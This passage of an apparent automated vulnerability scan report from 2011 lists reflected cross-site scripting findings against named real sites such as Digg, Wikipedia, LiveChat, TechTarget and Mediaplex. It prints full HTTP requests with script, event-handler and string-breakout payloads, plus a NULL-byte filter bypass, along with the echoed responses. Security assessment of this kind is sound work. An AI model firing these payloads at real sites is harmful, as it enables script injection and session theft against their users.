Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%008affd"><script>alert(1)</script>0f044f917b8 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=2038971 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18218

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%008affd"><script>alert(1)</script>0f044f917b8.rss">
...[SNIP]...

1.24. http://en.wikipedia.org/wiki/Website#Product-_or_service-based_sites/x26amp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Website#Product-_or_service-based_sites/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %004394f<script>alert(1)</script>f633f3a958b was submitted in the REST URL parameter 2. This input was echoed as 4394f<script>alert(1)</script>f633f3a958b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /wiki/%004394f<script>alert(1)</script>f633f3a958b/x26amp HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:01:37 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/%004394f<script>alert(1)</script>f633f3a958b/x26amp
Content-Length: 5410
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:3128
X-Cache: MISS from sq38.wikimedia.org
X-Cache-Lookup: MISS from sq38.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/%004394f<script&
...[SNIP]...
<p style="font-weight: bold;">To check for "%004394f<script>alert(1)</script>f633f3a958b/x26amp" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/%004394f<script>
...[SNIP]...

1.25. http://en.wikipedia.org/wiki/Website#Product-_or_service-based_sites/x26amp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Website#Product-_or_service-based_sites/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aa7a3"><script>alert(1)</script>8cfe4eae7a3 was submitted in the REST URL parameter 2. This input was echoed as aa7a3"><script>alert(1)</script>8cfe4eae7a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:01:17 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp
Content-Length: 5438
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/%00aa7a3">&
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp" title="Wikipedia:%00aa7a3">
...[SNIP]...

1.26. http://gis1.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis1.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 4ba19<script>alert(1)</script>049c3a47bdf was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load4ba19<script>alert(1)</script>049c3a47bdf HTTP/1.1
Host: gis1.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_load4ba19<script>alert(1)</script>049c3a47bdf({"server":"chat.livechatinc.net"})

1.27. http://gis2.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis2.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 929e6<script>alert(1)</script>6e265ba17ce was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load929e6<script>alert(1)</script>6e265ba17ce HTTP/1.1
Host: gis2.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_load929e6<script>alert(1)</script>6e265ba17ce({"server":"chat.livechatinc.net"})

1.28. http://gis3.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis3.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload ea3d9<script>alert(1)</script>6b4f76bc96d was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_loadea3d9<script>alert(1)</script>6b4f76bc96d HTTP/1.1
Host: gis3.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_loadea3d9<script>alert(1)</script>6b4f76bc96d({"server":"chat.livechatinc.net"})

1.29. http://gis4.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis4.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d4bbe<script>alert(1)</script>ae16b26f03b was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_loadd4bbe<script>alert(1)</script>ae16b26f03b HTTP/1.1
Host: gis4.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/open-support-case
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_loadd4bbe<script>alert(1)</script>ae16b26f03b({"server":"chat.livechatinc.net"})

1.30. http://gis5.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis5.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 6c10a<script>alert(1)</script>adbd0b08f57 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load6c10a<script>alert(1)</script>adbd0b08f57 HTTP/1.1
Host: gis5.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/live-chat
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_load6c10a<script>alert(1)</script>adbd0b08f57({"server":"chat.livechatinc.net"})

1.31. http://go.techtarget.com/clicktrack-r/activity/activity.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://go.techtarget.com
Path:	/clicktrack-r/activity/activity.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6ee3<img%20src%3da%20onerror%3dalert(1)>42547d9da14 was submitted in the REST URL parameter 3. This input was echoed as a6ee3<img src=a onerror=alert(1)>42547d9da14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /clicktrack-r/activity/activity.gifa6ee3<img%20src%3da%20onerror%3dalert(1)>42547d9da14?activityTypeId=16&t=299972&t2=301219&a=2011-09-04%2007:14:05&c=normal&r=340617&g=2240040538 HTTP/1.1
Host: go.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538; __utma=1.1422293104.1315138449.1315138449.1315138449.2; __utmb=1.1.10.1315138449; __utmc=1; __utmz=1.1315138449.2.2.utmcsr=google.com|utmccn=(organic)|utmcmd=organic|utmctr=%22xss.cx%22; tt_ui=%7B%22textSize%22%3A0%7D; ugcCltHeight=

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 12:17:38 GMT
Content-Length: 484

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.</h1>
...[SNIP]...

1.32. http://hs.maas360.com/main-site-theme/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://hs.maas360.com
Path:	/main-site-theme/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 59837--><a>584384740af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /main-site-theme/?59837--><a>584384740af=1 HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a>584384740af=1"
[4]=>
...[SNIP]...

1.33. http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15949/135754/Capacity_Banner_3_640x480.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a0f4"-alert(1)-"e305e7e075d was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.77400058440205617a0f4"-alert(1)-"e305e7e075d&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/ HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=15949:6950/12896:18091/17550:16453/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:00 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 17:52:42 GMT
ETag: "8a79a7-f7f-4abd0cb778e80"
Accept-Ranges: bytes
Content-Length: 5563
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.77400058440205617a0f4"-alert(1)-"e305e7e075d");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.77400058440205617a0f4"-alert(1)-"e305e7e075d");
...[SNIP]...

1.34. http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15949/135754/Capacity_Banner_3_640x480.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c74b4'%3balert(1)//f093b248a6a was submitted in the mpck parameter. This input was echoed as c74b4';alert(1)//f093b248a6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.7740005844020561c74b4'%3balert(1)//f093b248a6a&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/ HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=15949:6950/12896:18091/17550:16453/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:03 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 17:52:42 GMT
ETag: "8a79a7-f7f-4abd0cb778e80"
Accept-Ranges: bytes
Content-Length: 5569
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
_citrix_netscaler_f5_shadow_WelAd_090411_bonus,C=Citrix,P=NetworkWorld,A=Citrix,K=3059920/0.7740005844020561/0/tc,ac,l2c,c:/http://altfarm.mediaplex.com/ad/ck/15949-135754-6950-5?mpt=0.7740005844020561c74b4';alert(1)//f093b248a6a" target="_blank">
...[SNIP]...

1.35. http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15949/135754/Capacity_Banner_3_640x480.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3905d"%3balert(1)//ecf698608ec was submitted in the mpvc parameter. This input was echoed as 3905d";alert(1)//ecf698608ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.7740005844020561&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/3905d"%3balert(1)//ecf698608ec HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=15949:6950/12896:18091/17550:16453/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:05 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 17:52:42 GMT
ETag: "8a79a7-f7f-4abd0cb778e80"
Accept-Ranges: bytes
Content-Length: 5565
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
3837886/1;;~aopt=2/0/25/0;~sscs=?http://tr.adinterax.com/re/computerworld,NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus,C=Citrix,P=NetworkWorld,A=Citrix,K=3059920/0.7740005844020561/0/tc,ac,l2c,c:/3905d";alert(1)//ecf698608ec");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b78/2/0/*/c;245674177;0-0;0;43070067;255-0/0;43820099/43837886/1;;~aopt=2/0/25/0;~ssc
...[SNIP]...

1.36. http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15949/135754/Capacity_Banner_3_640x480.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d58f0'%3balert(1)//57142596da5 was submitted in the mpvc parameter. This input was echoed as d58f0';alert(1)//57142596da5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.7740005844020561&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/d58f0'%3balert(1)//57142596da5 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=15949:6950/12896:18091/17550:16453/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:07 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 17:52:42 GMT
ETag: "8a79a7-f7f-4abd0cb778e80"
Accept-Ranges: bytes
Content-Length: 5565
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
3837886/1;;~aopt=2/0/25/0;~sscs=?http://tr.adinterax.com/re/computerworld,NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus,C=Citrix,P=NetworkWorld,A=Citrix,K=3059920/0.7740005844020561/0/tc,ac,l2c,c:/d58f0';alert(1)//57142596da5http://altfarm.mediaplex.com/ad/ck/15949-135754-6950-5?mpt=0.7740005844020561" target="_blank">
...[SNIP]...

1.37. http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51ff7'%3balert(1)//178d594bd57 was submitted in the mpck parameter. This input was echoed as 51ff7';alert(1)//178d594bd57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D825862051ff7'%3balert(1)//178d594bd57&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:33 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 23:09:57 GMT
ETag: "803414-fc8-4abd53a0a9b40"
Accept-Ranges: bytes
Content-Length: 4922
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
ef="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/17550-135052-6950-0?mpt=825862051ff7';alert(1)//178d594bd57" target="_blank">
...[SNIP]...

1.38. http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 656a0"-alert(1)-"a474aaf0673 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

